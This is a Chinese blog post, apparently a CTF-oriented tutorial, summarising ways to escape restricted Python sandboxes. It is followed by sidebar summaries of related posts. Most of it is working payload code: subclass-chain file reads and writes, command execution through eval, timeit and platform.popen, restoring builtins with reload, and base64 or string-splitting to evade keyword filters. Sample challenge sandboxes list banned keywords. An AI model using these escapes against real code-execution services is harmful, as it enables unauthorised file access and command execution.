python沙箱逃逸小结

最新推荐文章于 2024-03-12 11:19:30 发布
最新推荐文章于 2024-03-12 11:19:30 发布
阅读量8.5k 收藏 10
点赞数 2
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35078631/article/details/78504415
版权

之前碰到了flask模板的漏洞的时候接触过python的一些东西,之前没时间去细看,现在看感觉很强悍,简单总结一下
首先我们不说原理了,也不是太明白,我们直接讲利用,一些python好玩的特性

1.内联函数

python的内敛函数真是强大,可以调用一切函数做自己想做的事情

__builtins__
__import__

我们输入

dir('builtins')

发现如下

这里写图片描述

我们在python的object类中集成了很多的基础函数,我们想要调用的时候也是需要用object去操作的,现在小小总结了两种创建object的方法如下 

().__class__.__bases__[0]
''.__class__.__mro__[2]

验证如下
>>> print ''.__class__.__mro__[2]
<type 'object'>
>>> print ().__class__.__bases__[0]
<type 'object'>

然后我们看一下

这里写图片描述

存在一个hook函数,直接可以调用

这里写图片描述

存在file类型的object,事实上调用后可以对文件操作了
利用代码如下 

//读文件
().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read()

//写文件
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')

//执行任意命令
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls  /var/www/html").read()' )

2.python中可以执行任意代码的神奇函数

(1)timeit

import timeit
timeit.timeit("__import__('os').system('dir')",number=1)

(2)exec 和eval 比较经典了

eval('__import__("os").system("dir")')

(3)platform

import platform
print platform.popen('dir').read()

(4)random和math

(暂时没找到)

3.一些简单攻击总结

(1)reload方法

>>> del __builtins__.__dict__['__import__'] # __import__ is the function called by the import statement
>>> del __builtins__.__dict__['eval'] # evaluating code could be dangerous
>>> del __builtins__.__dict__['execfile'] # likewise for executing the contents of a file
>>> del __builtins__.__dict__['input'] # Getting user input and evaluating it might be dangerous

看似删除了函数,但是没有过滤reload函数

reload(__builtins__)

即可恢复

(2)寻找替代函数

我们在最开始的介绍本质上就是找到了__builtins__的file属性的替代函数,可以直接进行文件操作,包括后面的任意命令执行也是找到了替代函数

(3)加密解密绕过字符串过滤

有可能前端是个web界面,过滤关键词,这里可以用encode什么尝试过滤,如下

>>> import base64
>>> base64.b64encode('__import__')
'X19pbXBvcnRfXw=='
>>> base64.b64encode('os')
'b3M='

然后可以构造

>>> __builtins__.__dict__['X19pbXBvcnRfXw=='.decode('base64')]('b3M='.decode('base64'))
<module 'os' from '/usr/lib/python2.7/os.pyc'>

或者利用python对字符串处理的便利绕过,例如

[x for x in [].class.base.subclasses() if x.name == 'catch_warnings'][0].init.func_globals['linecache'].dict['o'+'s'].dict['sy'+'stem']('echo Hello SandBox')

4.收集的一些小题目

#!/usr/bin/env python
from future import print_function

print("Welcome to my Python sandbox! Enter commands below!")

banned = [ 
    "import",
    "exec",
    "eval",
    "pickle",
    "os",
    "subprocess",
    "kevin sucks",
    "input",
    "banned",
    "cry sum more",
    "sys"
]

targets = builtins.dict.keys() 
targets.remove('raw_input') 
targets.remove('print') 
for x in targets: 
    del builtins.dict[x]

while 1: 
    print(">>>", end=' ')
    data = raw_input()

    for no in banned:
        if no.lower() in data.lower():
            print("No bueno")
            break
    else: # this means nobreak
        exec data
def make_secure():
    UNSAFE = ['open',
              'file',
              'execfile',
              'compile',
              'reload',
              '__import__',
              'eval',
              'input']
    for func in UNSAFE:
        del __builtins__.__dict__[func]
from re import findall
# Remove dangerous builtins
make_secure()
print 'Go Ahead, Expoit me >;D'
while True:
    try:
        # Read user input until the first whitespace character
        inp = findall('\S+', raw_input())[0]
        a = None
        # Set a to the result from executing the user input
        exec 'a=' + inp
        print 'Return Value:', a
    except Exception, e:
    print 'Exception:', e

应该比较粗糙,欢迎批评指正,或者大佬指点补充一下~

















Assassin__is__me
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
PyBox:Python 中的虚拟沙箱
06-06
盒子 来自 code.google.com/p/pyboxed 的 PyBox 镜像,一个用于监控进程的用户级框架。 PyBox 由 一个模块(PyBox.dll),它被注入到目标进程和 API 提供各种工具,用于记录和分析活动以及对流程进行全面操作。 这种类似 Rootkit 的方法允许密切监视行为,从而有助于了解程序的功能。 什么是 PyBox PyBox(“Python Sandbox”的缩写)是一个灵活且轻量级的过程和系统分析框架。 最初,我们开始这个项目的目的是为半自动恶意软件分析创建一个沙箱工具包,它既易于理解又易于扩展。 使用 Python 作为主要编程语言允许对包含监控设置和功能的脚本进行动态甚至运行时修改。 这消除了在针对特殊情况定制应用程序时频繁重新编译源代码的需要,并有利于快速原型设计的想法。 PyBox 的原始想法在 PyBox - 沙盒Python
python sandbox到flask ssti模板注入
CODER的博客
02-24 750
前置知识学习 我就不照抄一遍了 本博客主要是放题目 https://www.k0rz3n.com/2018/05/04/Python 沙盒逃逸备忘/ https://hatboy.github.io/2018/04/19/Python沙箱逃逸总结/ 绕过方案: # 利用file()函数读取文件: print(().__class__.__bases__[0].__subclasses__()[40...
Chrome 沙箱逃逸 -- Plaid CTF 2020 mojo
qq_61670993的博客
02-07 2382
chrome 沙箱逃逸初探
python沙盒(virtualenv)
daduryi的博客
05-15 443
当电脑需要使用多个版本的python时,可以使用沙盒;或者使用docker; virtualenv是Python自带的,通过pip安装的 [root@centos7 public]# cd jinjie_python/ [root@centos7 jinjie_python]# virtualenv test1 Using base prefix '/usr/local' New py...
用RestrictedPython创建Python Sandbox
marlonyao的专栏
02-13 1482
众所周知在Python下可以用eval和exec来执行任意的python表达式及脚本,但是,当运行的脚本来自于网络时这样做就会有安全风险,你总不想运行包含"import os; os.system('rm -rf /')"的脚本吧?对这类问题,通常的解决方法是为来自网络的脚本创建一个沙箱(Sandbox),浏览器在执行来自网络的Java Applet时会创建一个权限较低的Sandbox,在其中运行...
PySandbox:一个安全的Python执行环境
最新发布
gitblog_00001的博客
03-12 408
PySandbox:安全地运行Python代码 PySandbox 是一个用于安全地运行Python代码的库。它允许您在隔离的环境中执行未知或不信任的代码,并且不会影响到您的系统。 PySandbox能用来做什么? PySandbox可以用来处理以下场景: 在线教育平台上的编程作业提交和评测:可以使用PySandbox来创建一个安全的环境,在其中运行学生的代码,并确保它们不会对系统造成任何损害。...
python 跳过_Python 沙盒绕过
weixin_39858275的博客
11-24 515
思考了一下,Python沙箱逃逸的意义,不过就是如何通过绕过限制,拿到出题人或者安全运维人员不想让我们拿到的”危险函数”,或者绕过Python终端达到命令执行的效果。起因以前我也做过一些Python沙盒逃逸的小题目,也翻译和写过两篇关于Python沙盒逃逸的文章。然而在这次国赛的题目,我好像又进一步理解了Python沙箱…绕过沙盒方法关于import通常思路,我们应该找到题目还给我们留下了什么,通...
Python Jail 沙盒逃逸 合集
Jay17的博客
08-22 2560
Python Jail 沙盒逃逸 合集
python沙箱逃逸总结
weixin_44576725的博客
04-14 3664
python沙箱逃逸总结 让用户提交 Python 代码并在服务器上执行,是一些 OJ、量化网站重要的服务,很多 CTF 也有类似的题。为了不让恶意用户执行任意的 Python 代码,就需要确保 Python 运行在沙箱中。沙箱经常会禁用一些敏感的函数,例如 os,研究怎么逃逸、防护这类沙箱还是蛮有意思的。 前言 Python沙箱逃逸的最终目标就是执行系统任意命令,次一点的写文件,再次一点的读文件。 顺便安利一本书:《流畅的 Python》。这本书有很多中高阶知识点,很全面而且讲的很清楚,如果你看过,相
Python沙箱逃逸终极指南:安全漏洞分析和解决方案一网打尽
Rocky006的博客
01-16 1110
Python 是一种强大而灵活的编程语言,但在某些情况下,可能需要运行不受信任的代码,同时又希望限制它的行为,以防止对系统的不良影响。这时,Python 沙箱就成为一种有用的工具,它可以帮助你在安全的环境中运行不受信任的代码。本文将探讨 Python 沙箱的概念、常见的沙箱技术以及如何避免沙箱逃逸
2022强网杯web方向wp
xjh8023的博客
08-01 1432
考点文件泄露,、文件上传、文件包含、反序列化1.扫描目录存在www.zip,存在源码泄露2.代码审计,写一个inc文件内容为上传该文件,修改类型为image/jpeg2.进行反序列化,new一个类3.抓包将反序列化的值赋值给userfile,发包得到fla。...
沙箱逃逸练习题python源码
02-13
里面是近十道python逃逸题目的python源码,在python环境中运行既可以进入题目环境。 可以查看我写的沙箱逃逸的博客结合练习 https://blog.csdn.net/qq_43390703/article/details/104256001
沙箱逃逸技术总结.ppt
07-25
无论是哪种沙箱技术,总归无法和真实环境比拟,所以沙箱逃避技术在高级别病毒样本已经普遍存在,并且逃避技术也在逐渐更新。 下面总结下当前的逃避技术,我分为两个特点进行分析。 ·针对虚拟机检测 ·针对沙箱分析环境特点的对抗
使用OpCode绕过Python沙箱的方法详解
01-20
opcode又称为操作码,是将python源代码进行编译之后的结果,python虚拟机无法直接执行human-readable的源代码,因此python编译器第一步先将源代码进行编译,以此得到opcode。例如在执行python程序时一般会先生成一个...
沙箱逃逸技术总结
09-11
沙箱逃逸技术总结。
python批量提交沙箱问题实例
12-24
本文实例讲述了python批量提交沙箱问题,分享给大家供大家参考。具体方法如下: 出现的问题如下: 1. Popen的使用,在linux下参数用列表传,不要用字符串传 否则可能会有“OSErrorror: [Errno 2] No such file or ...
CTF-练习平台 Web writeup By Assassin [暂时完结]
热门推荐
Assassin
04-06 6万+
签到题 web2 文件上传测试经典的题目,用burp抓包得到如下 然后我们更改一下上传路径然后用%00截断一下即可Content-Disposition: form-data; name="file"; filename="3.png%001.php"计算题改一下浏览器中的text的长度Web3进去一直弹框,没完没了…直接禁用了F12看源码,发现有一个<!--KEY&#
i春秋 百度杯”CTF比赛(二月场) Misc&&web题解 By Assassin
Assassin
03-16 2万+
学习web,搞起来! 百度杯”CTF比赛(二月场)训练赛传送门爆破-1打开题目我们直接就看到源码,加上注释如下<?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值 if(!preg_match('/^\w*$/',$a )){ //正则
Wechall writeup By Assassin
Assassin
08-25 1万+
不得不说wechall的题目还是挺有趣的,外国的题目感觉和国内的题目不太一样,真是学习学习了,wp持续跟新Prime Factory #_*_ coding:utf-8 _*_ import math def is_prime(num): for i in range(2,int(math.sqrt(num))+1): if num%i==0: ret
python沙箱逃逸
08-16
Python沙箱逃逸是指在运行Python代码时,绕过沙箱的限制,执行一些敏感的函数或操作。为了防止恶意用户执行任意的Python代码,沙箱通常会禁用一些敏感函数,例如os模块。通过一些技巧来逃逸沙箱的限制。 其中一种方法是使用import语句来导入受限制的模块,例如os模块。在Python 2.x中,可以使用import os来导入os模块,然后执行一些敏感操作,如system('ls')。在Python 3.x中,可以使用importlib模块来实现,比如importlib.import_module('os').system('ls')。另外,在Python 2.x中还可以使用execfile函数来执行指定文件中的代码,如execfile('/usr/lib/python2.7/os.py') system('ls')。但需要注意的是,execfile函数在Python 3.x中已被删除。 另一种通用的方法是通过处理字符串来绕过沙箱的限制。可以将敏感操作的代码写入一个文件,然后使用with open语句读取文件内容,并使用exec函数来执行代码,如with open('/usr/lib/python3.6/os.py', 'r') as f: exec(f.read()) system('ls')。这种方法适用于Python 2.x和3.x。 需要注意的是,沙箱逃逸是一个敏感的问题,针对不同的沙箱实现,可能会有不同的逃逸方法。在编写沙箱时,需要综合考虑各种情况,确保沙箱的安全性。同时,对于用户提交的代码,也要进行严格的输入验证和代码审查,以防止恶意代码的执行。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [python沙箱逃逸总结](https://blog.csdn.net/weixin_44576725/article/details/124176751)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [各种姿势解析-python沙箱逃逸](https://blog.csdn.net/qq_43390703/article/details/106231154)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值